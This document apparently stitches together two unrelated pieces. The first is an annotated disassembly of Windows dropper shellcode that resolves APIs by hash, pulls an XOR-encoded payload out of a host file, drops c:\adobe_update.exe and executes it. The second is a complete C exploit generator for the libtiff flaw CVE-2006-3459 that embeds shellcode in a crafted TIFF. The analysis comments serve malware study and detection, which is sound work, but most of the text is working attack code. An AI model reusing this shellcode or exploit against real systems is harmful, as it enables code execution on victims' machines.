

; Position-independent 32-bit x86 shellcode, Windows target (IDA listing; the
; procedure is closed by `start endp` further down). The entry trick: `call $+5`
; pushes the address of the following `push 0Ch`, and `push 0Ch` pushes the number
; of API-name hashes in the table below; loc_401099 pops both.
call $+5                        ; [esp] = address of the `push 0Ch` instruction
push 0Ch                        ; 12 = number of hash slots resolved in loc_4010AB
jmp short loc_401099
; Inline data. The first 12 dwords (starting at the `db` below) are API-name
; hashes that loc_4010AB overwrites in place with resolved addresses; IDA has
; sliced the table one byte early, so the dword boundaries shown are not the
; runtime slots. After the hashes the bytes decode (little-endian ASCII) to
; "cmd /c c:\adobe_update.exe", "c:\data.EXE" and "c:\data.bIN" — these paths
; are the file-system indicators left by this sample. The listing seems to be
; missing some bytes before loc_401099 (addresses do not add up) — confirm
; against the original binary.
db 4Ch, 22h, 80h
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh
dd 2E657461h, 657865h, 0
dd 5C3A6300h, 61746164h, 4558452Eh, 0
dd 5C3A6300h, 61746164h, 4E49622Eh, 0
db 0

; Locate a system DLL by walking the PEB loader list (no imports needed).
; Detection note: `mov eax, fs:30h` followed by the +0Ch/+1Ch dereferences is
; the classic PEB-walk pattern and is a good static signature on its own.
loc_401099:
pop ecx                         ; ecx = 0Ch (hash count)
pop edi                         ; edi = address of `push 0Ch`
scasd                           ; edi += 4 -> first hash slot (compare result unused)
mov eax, fs:30h                 ; TEB->PEB (fs:[30h] on 32-bit Windows)
mov eax, [eax+0Ch]              ; PEB->Ldr
mov esi, [eax+1Ch]              ; Ldr->InInitializationOrderModuleList.Flink
lodsd                           ; eax = Flink of the first entry, i.e. the second module
mov ebp, [eax+8]                ; ebp = DllBase of that entry (+8 from its InInitOrder links)
; On XP-era Windows the second InInitializationOrder entry is kernel32.dll; on
; Windows 7 and later it is KernelBase.dll, so hashes of kernel32-only exports
; would not resolve there — a common reason such samples fail on newer hosts.

; Resolve each of the 12 hashed export names from the module in ebp and store the
; function address over its hash slot (stosd). The hash is ROR-13-and-add over
; the name bytes; the `ror ebx, 0Dh` / `add ebx, edx` pair is a widely used API-
; hashing signature (suitable for a YARA rule).
loc_4010AB:
push ecx                        ; save remaining slot count
mov esi, [ebp+3Ch]              ; e_lfanew
mov esi, [esi+ebp+78h]          ; OptionalHeader.DataDirectory[0] = export directory RVA
add esi, ebp                    ; esi = IMAGE_EXPORT_DIRECTORY*
push esi                        ; kept for the ordinal/address lookups below
mov esi, [esi+20h]              ; AddressOfNames RVA
add esi, ebp                    ; esi = array of name RVAs
xor ecx, ecx
dec ecx                         ; ecx = -1: name index, pre-incremented per name

loc_4010BE:                     ; for each exported name
inc ecx
lodsd                           ; eax = next name RVA
add eax, ebp                    ; eax = name string
xor ebx, ebx                    ; ebx = running hash

loc_4010C4:                     ; hash = ror13(hash) + byte, until the terminator
movsx edx, byte ptr [eax]       ; sign-extended byte; dh becomes the sign byte
cmp dl, dh                      ; equal only for 00h (and, as a quirk, for 0FFh)
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx                    ; bytes >= 80h are added sign-extended
inc eax
jmp short loc_4010C4

loc_4010D3:
cmp ebx, [edi]                  ; compare with the current hash slot
jnz short loc_4010BE            ; no bound on NumberOfNames: runs off the table if absent
pop esi                         ; esi = export directory
mov ebx, [esi+24h]              ; AddressOfNameOrdinals RVA
add ebx, ebp
mov cx, [ebx+ecx*2]             ; ordinal (16-bit write; relies on ecx < 10000h)
mov ebx, [esi+1Ch]              ; AddressOfFunctions RVA
add ebx, ebp
mov eax, [ebx+ecx*4]            ; function RVA
add eax, ebp
stosd                           ; [edi] = resolved address, edi -> next slot
pop ecx
loop loc_4010AB                 ; all 12 slots
sub edi, 38h                    ; edi = table base; slots are now [edi+8] .. [edi+34h]
xor esi, esi                    ; esi = candidate handle value (incremented from 1 below)

; Find the host file by brute-forcing handle values 1, 2, 3, ... through
; [edi+18h](esi, &[edi+80h]) until it returns something other than -1 that is
; larger than 1000h bytes. The (handle, out-pointer) shape and the -1 test look
; like GetFileSize — confirm against the resolved hash. There is no upper bound
; on esi, so a process with no qualifying file handle would loop indefinitely.
loc_4010F4:
inc esi                         ; next candidate handle
lea eax, [edi+80h]
push eax                        ; out parameter written to [edi+80h]
push esi
call dword ptr [edi+18h]
cmp eax, 0FFFFFFFFh             ; -1: not usable
jz short loc_4010F4
cmp eax, 1000h                  ; skip anything of 1000h bytes or less (unsigned compare)
jbe short loc_4010F4
mov [edi+4], eax                ; [edi+4] = size (by the entry layout this overwrites the `push 0Ch` bytes)
mov [edi+80h], esi              ; [edi+80h] = handle
push dword ptr [edi+4]
push 40h                        ; 40h = LMEM_ZEROINIT/GMEM_ZEROINIT if this is LocalAlloc/GlobalAlloc — confirm
call dword ptr [edi+34h]        ; allocate `size` bytes; result unchecked
mov [edi+7Ch], eax              ; [edi+7Ch] = buffer
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]        ; 4-arg (handle, 0, 0, 0): looks like SetFilePointer to offset 0
cmp eax, 0FFFFFFFFh
jz short loc_40118B             ; failure -> release buffer, try next handle
push 0
lea ebx, [edi+90h]
push ebx                        ; [edi+90h] receives the byte count
push dword ptr [edi+4]
push dword ptr [edi+7Ch]
push dword ptr [edi+80h]
call dword ptr [edi+28h]        ; 5-arg (handle, buf, size, &count, 0): looks like ReadFile; return unchecked
mov ecx, [edi+90h]              ; bytes read
sub ecx, 0Ah                    ; scan budget; nothing checks the count was >= 0Ah first
mov eax, [edi+7Ch]              ; eax = buffer (scan starts at buffer+1 because of the `inc` below)

; Scan the buffer for the start marker "FVCK" + 19890604h and then for the end
; marker "KaKa" + 19811106h (the dword constants are little-endian ASCII).
; As bytes, 46 56 43 4B 04 06 89 19 and 4B 61 4B 61 06 11 81 19 are a usable
; file signature for carriers of this payload.
loc_401158:
inc eax                         ; byte-wise scan
cmp dword ptr [eax], 4B435646h  ; "FVCK"
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E

loc_40116A:
loop loc_401158                 ; ecx = remaining scan budget
jmp short loc_40118B            ; start marker absent -> release and try next handle

loc_40116E:
add eax, 8                      ; skip the 8-byte marker
mov [edi+94h], eax              ; [edi+94h] = start of the encoded payload

loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh  ; "KaKa"
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197

loc_401189:
loop loc_401177                 ; ecx is not reset; continues the first scan's budget

loc_40118B:                     ; cleanup path: free the buffer and retry
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]        ; 1-arg free (LocalFree/GlobalFree-like shape) — confirm
jnz loc_4010F4                  ; branches on flags left by the callee: fragile. If ZF is set
                                ; on return, execution falls through into loc_401197 with a
                                ; bogus eax, so the "end marker found" path is reachable by accident.

; Payload bounds are known: create the three output files. Each call is
; [edi+20h](path, 2); the (path, attribute) shape matches _lcreat — confirm.
; None of the three return values is checked, so a failed create (e.g. no write
; access to C:\) goes unnoticed and the bad handle is used for writing.
loc_401197:                     ; eax = address of the end marker
mov [edi+98h], eax              ; [edi+98h] = end of the encoded payload
push 2
lea esi, [edi+3Fh]              ; "c:\adobe_update.exe" (from the data block)
push esi
call dword ptr [edi+20h]
mov [edi], eax                  ; handle 1 (stored over the already-executed entry `call` bytes)
push 2
lea esi, [edi+58h]              ; "c:\data.EXE"
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax              ; handle 2
push 2
lea esi, [edi+68h]              ; "c:\data.bIN"
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax             ; handle 3
mov ebx, [edi+98h]
sub ebx, [edi+94h]              ; ebx = payload length; its low byte is also the initial XOR key
mov eax, [edi+94h]              ; eax = payload cursor

; In-place decode: byte[i] ^= (length - i) & 0FFh, i.e. a byte key that starts at
; the low byte of the length and counts down to 1. Useful for writing an
; extractor for the embedded files. Note: if the two markers are adjacent
; (length 0) the first `dec` wraps to -1 and the loop writes across ~4 GB.
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
; Decoded layout as consumed here: three dword lengths, then three blobs back to
; back. The lengths are trusted as-is; nothing checks they fit in the bytes read.
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx             ; len1
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx             ; len2
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx             ; len3
add eax, 4
mov esi, eax                    ; esi = blob1
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]        ; 3-arg (handle, buf, len): blob1 -> c:\adobe_update.exe (_lwrite-like shape)
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]             ; esi = blob2
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]        ; blob2 -> c:\data.EXE
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]             ; esi = blob3
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]        ; blob3 -> c:\data.bIN
push dword ptr [edi]
call dword ptr [edi+1Ch]        ; 1-arg call on each handle: close
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]
call dword ptr [edi+8]          ; 0-arg call whose result is appended to the command string
                                ; below as a C string — presumably GetCommandLineA; confirm
; Build "cmd /c c:\adobe_update.exe <string from [edi+8]>" in the data block and
; hand it to [edi+0Ch] through a hand-made call frame.
push eax                        ; save the string pointer returned by [edi+8]
lea esi, [edi+3Fh]              ; esi = "c:\adobe_update.exe"
mov edx, esi

loc_401262:                     ; find the terminating NUL of the path string
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262

loc_40126B:
mov byte ptr [edx-1], 20h       ; replace the NUL with a space
pop ecx                         ; ecx = string to append

loc_401270:                     ; strcpy-style append with no length bound: a long string
mov al, [ecx]                   ; overruns the data block into the bytes that follow it
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270

loc_40127C:
mov [edx], al                   ; terminating NUL
sub esi, 7                      ; back up over "cmd /c " -> esi = full command line
call $+5                        ; push the address of the next instruction ...
add [esp+4+var_4], 0Dh          ; ... then move it 0Dh bytes forward, i.e. just past the `jmp` below
push 0                          ; arg 2 of the callee (0 would be SW_HIDE if this is WinExec — confirm)
push esi                        ; arg 1 = command line
push dword ptr [edi+2Ch]        ; pushed where the callee sees its return address, so [edi+0Ch]
jmp dword ptr [edi+0Ch]         ; returns straight into [edi+2Ch] (API chaining); this is a tail jump,
                                ; not a call. Which two APIs these are needs the resolved hashes.
start endp

; Bytes after the procedure; the adjusted return address built above (call $+5 /
; add ..., 0Dh) points here. Read as code the first bytes are 6A 00 / 6A FF /
; FF 57 14 = push 0; push -1; call dword ptr [edi+14h], followed by NOPs and
; 0B58h zero bytes that IDA shows as data. Whether this is reached depends on the
; callee chain above — confirm in a sandbox.
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends


#include <stdio.h>
#include <string.h>
#include <tiffio.h>
#include <stdlib.h>
#include <stdbool.h>

/*
 * basic exploit for CVE-2006-3459.
 *
 * $ ./a.out 
 * [*] creating exploit.tif, target address: 0xb7959000
 * [*] marker tag found at offset 524418.
 * [*] success.
 * $ display exploit.tif 
 * uid=1000(taviso) gid=100(users) groups=10(wheel)
 *
 * -- taviso@gentoo.org
 */

/* size of nop sled: 2048 << 8 = 524288 bytes; the sample offset printed in the
 * header ("marker tag found at offset 524418") is this sled plus the file header */
#define SLEDSIZ (2048 << 8)

/* get this address by printing tif->tif_base in a debugger; this hard-coded
 * value ties the generated file to one libtiff build and load address, which is
 * why ASLR and non-executable mappings defeat this PoC as written */
#define RETADDR (0xb7919000 + SLEDSIZ/2)

#define MARKER 0xc0de /* this must be unique, make it anything — main() rewrites
                         the first 16-bit occurrence of it in the output file */

/* Linux/x86 payload bytes, treated as opaque data by the rest of this program.
 * The ASCII visible in them ("/bin/sh", "-c", "/usr/bin/id") agrees with the
 * `uid=...` output quoted in the header comment. */
unsigned char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80";

/* Custom tag registered with libtiff through TIFFMergeFieldInfo() in main().
 * Its tag number is MARKER, which the post-processing loop later locates in the
 * written file and rewrites to TIFFTAG_DOTRANGE. Initializer order follows the
 * TIFFFieldInfo struct from tiffio.h. */
TIFFFieldInfo badfield = {
    MARKER,         /* a unique unsigned short we search for */
    100,            /* number of shorts to read onto stack */
    100,            /* number we want to write into file */
    TIFF_SHORT,     /* data type */
    FIELD_CUSTOM,   /* field bit */
    1,              /* okay to change? */
    0,              /* passcount */
    "Exploit"       /* a name, unused */
};

/*
 * Writes exploit.tif as described in the header comment.
 *
 * Flow, all of it visible below: register the custom MARKER tag, write a TIFF
 * whose single strip is a NOP sled followed by `shellcode`, then reopen the file
 * and rewrite the MARKER tag number to TIFFTAG_DOTRANGE so that the reader this
 * PoC targets (CVE-2006-3459, per the header) handles the 100 SHORT values.
 *
 * argc/argv are unused. Returns 0 on success and 1 on any I/O failure.
 *
 * Review notes, left as-is since this is a historical PoC:
 *  - the malloc() failure branch prints a message but does not return, so buf
 *    can be NULL at memset();
 *  - ftell() returns long but is printed with %d, and RETADDR is printed with %p;
 *  - the scan patches the first 16-bit occurrence of MARKER, which is assumed
 *    not to appear anywhere else in the file.
 */
int main(int argc, char **argv)
{
    TIFF *tif;
    FILE *mod;
    unsigned char *buf;
    unsigned short d;
    unsigned f[badfield.field_readcount], i;   /* VLA sized by the field's read count (100) */

    fprintf(stderr, "[*] creating exploit.tif, target address: %p\n", RETADDR);

    /* prepare a buffer containing address of shellcode */
    for (i = 0; i < badfield.field_readcount; i++)
        f[i] = RETADDR;

    /* open the target exploit file */
    if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* teach libtiff about made up tag */
    TIFFMergeFieldInfo(tif, &badfield, 1);

    /* install basic required tags */
    TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, SLEDSIZ + sizeof(shellcode));
    TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
    TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
    TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);
    
    /* now send buffer containing return addresses; note f holds 32-bit values
     * while the tag is declared TIFF_SHORT, so libtiff copies it as shorts */
    TIFFSetField(tif, MARKER, &f);

    /* NOTE(review): no return on failure here, buf stays NULL for memset() below */
    if ((buf = malloc(SLEDSIZ + sizeof(shellcode))) == NULL) {
        fprintf(stderr, "[!] sorry, memory allocation error.\n");
    }
    
    memset(buf, 0x90, SLEDSIZ);
    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));

    /* disguise nop sled and shellcode as image data */
    TIFFWriteEncodedStrip(tif, 0, buf, SLEDSIZ + sizeof(shellcode));
    TIFFClose(tif);

    /* okay, now open the file to find the marker tag */
    if ((mod = fopen("exploit.tif", "r+")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* try to find the MARKER by continually reading shorts. */

    /* yes, this is ugly: read 2 bytes, then step back 1, so every byte offset
     * is examined (the marker is not assumed to be 2-byte aligned) */
    while (true) {
        if (fread(&d, sizeof(short), 1, mod) < 1) {
            fprintf(stderr, "[!] failed to find marker.\n");
            return 1;
        }
        if (d == MARKER) {
            fprintf(stderr, "[*] marker tag found at offset %d.\n", 
                    ftell(mod) - sizeof(short));

            /* rewind ready to overwrite it */
            if (fseek(mod, - sizeof(short), SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }

            /* i'll use dot range */
            d = TIFFTAG_DOTRANGE;

            /* write it in (a short write is reported but still counted as success) */
            if (fwrite(&d, sizeof(short), 1, mod) < 1) {
                fprintf(stderr, "[!] failed to write new tag number.\n");
            }

            break;
        } else {
            if (fseek(mod, - sizeof(short) + 1, SEEK_CUR) == -1) {
                fprintf(stderr, "[!] failed to reposition file.\n");
                return 1;
            }
        }
    }

    fclose(mod);

    fprintf(stderr, "[*] success.\n");
    return 0;
}
